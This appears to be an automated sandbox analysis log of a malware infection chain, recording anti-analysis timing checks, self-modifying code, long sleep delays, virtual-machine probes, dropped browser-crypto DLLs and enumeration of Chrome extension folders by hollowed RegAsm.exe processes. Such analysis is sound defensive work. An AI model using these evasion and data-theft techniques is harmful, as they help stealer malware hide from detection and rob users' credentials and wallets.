Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129E37 second address: 1129E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112CD5D second address: 112CD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112D0CC second address: 112D0DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5186DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112D0DF second address: 112D129 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5036BACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movsx edx, si 0x0000000e push dword ptr [ebp+12451AB4h] 0x00000014 mov edx, dword ptr [ebp+122D2E57h] 0x0000001a push 90884E58h 0x0000001f pushad 0x00000020 ja 00007F76E5036BA8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 jmp 00007F76E5036BB9h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E22C second address: 112E248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F76E5186DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76E5186DF0h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E248 second address: 112E263 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E263 second address: 112E2AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DF4h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F76E5186DEEh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F76E5186E17h 0x00000019 pushad 0x0000001a jmp 00007F76E5186DF7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E2AD second address: 112E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0425 second address: 54B0429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0429 second address: 54B042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B042F second address: 54B0446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 735CA34Fh 0x00000008 mov eax, 3A6A256Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0446 second address: 54B045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5036BB1h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B045B second address: 54B0493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 4AE5A2B3h 0x00000012 mov si, B70Fh 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F76E5186DF1h 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B04F7 second address: 54B053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e jmp 00007F76E5036BB9h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76E5036BACh 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B053A second address: 54B054C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DEEh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B054C second address: 54B0550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10547D8 second address: 10547DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: EA3B64 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: 1043620 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: 1050685 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 30A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 3220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 5220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 6040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 7040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 14B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 30E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 2F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 1780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 3230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 17A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 2130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 23C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 2130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 1360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 30E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 2EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 17A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 3290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 1810000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 770000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 2290000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 4290000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: B10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 30A0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1520000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3740000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 39C0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 1870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 51E0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1837
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 621
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\userEHJKFCGHID.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 5.1 %
Source: C:\Users\user\Desktop\FileApp.exe TID: 2536 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360 Thread sleep count: 281 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360 Thread sleep time: -56200s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884 Thread sleep count: 93 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884 Thread sleep time: -186093s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964 Thread sleep time: -210105s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264 Thread sleep count: 145 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264 Thread sleep time: -290145s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368 Thread sleep count: 128 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368 Thread sleep time: -256128s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368 Thread sleep count: 260 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368 Thread sleep time: -1560000s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032 Thread sleep count: 101 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032 Thread sleep time: -202101s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876 Thread sleep count: 113 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876 Thread sleep time: -226113s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472 Thread sleep count: 96 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472 Thread sleep time: -192096s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe TID: 2220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe TID: 1592 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe TID: 5128 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe TID: 2832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5720 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5316 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4928 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1408 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6532 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_004062EB FindFirstFileW,FindClose, 14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 22_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401160 GetSystemInfo,ExitProcess, 22_2_00401160
Source: C:\Users\user\Desktop\FileApp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
